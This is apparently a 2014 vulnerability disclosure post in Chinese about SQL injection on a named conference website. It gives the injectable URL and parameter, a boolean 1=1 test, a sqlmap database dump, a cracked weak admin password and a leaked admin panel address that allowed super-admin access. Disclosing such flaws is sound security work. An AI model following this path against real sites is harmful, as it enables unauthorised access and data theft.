漏洞详情

披露状态:

2014-09-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-11-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

看到一个搞互联网大会的,门票一日3000;两日5000;VIP10000,感觉好NB的。随便翻翻页面,发现这么NB的会议,支撑的技术竟然犯sql注入的低级错误。

详细说明:


名字起的很NB,票价也标的很NB。
先看看票价:

444.png


还是进入正题吧:
注入点:http://www.thegitc.com/index.php/home/index/getPersonnelDetailed?id=5
url中多添加1=1成功;1=2失败;
这么明显,那就直接丢到sqlmap里面去:


可以插入,那就让它去导库,我去找找后台。
在网站寻找后台管理界面失败。
库导完之后,看看库有啥用的信息。
+--------------------+
| tb_actor |
| tb_city |
| tb_config |
| tb_content |
| tb_graphic |
| tb_guest |
| tb_guest_apply_for |
| tb_lang |
| tb_langmask |
| tb_langtype |
| tb_meeting_module |
| tb_modelmanager |
| tb_news |
| tb_picture |
| tb_resource |
| tb_rights |
| tb_tpl |
| tb_tpl_lang |
| tb_user |
| tb_website |
+--------------------+
表tb_user有管理员信息,密码太简单,md5解出来是123456
另外表tb_langmask中爆漏了后台地址

222.png


直接进后台,而且是超级管理员。
前台信息想改啥就改啥。

333.png


另外裤中可以看到mysql的root密码,不过到此为止吧,这么贵的门票,我们还是消费不起啊!

漏洞证明:

333.png


我只是进来看看,真的什么也没动~

修复方案:

1、sql注入
2、后台密码太简单

标签: none

评论已关闭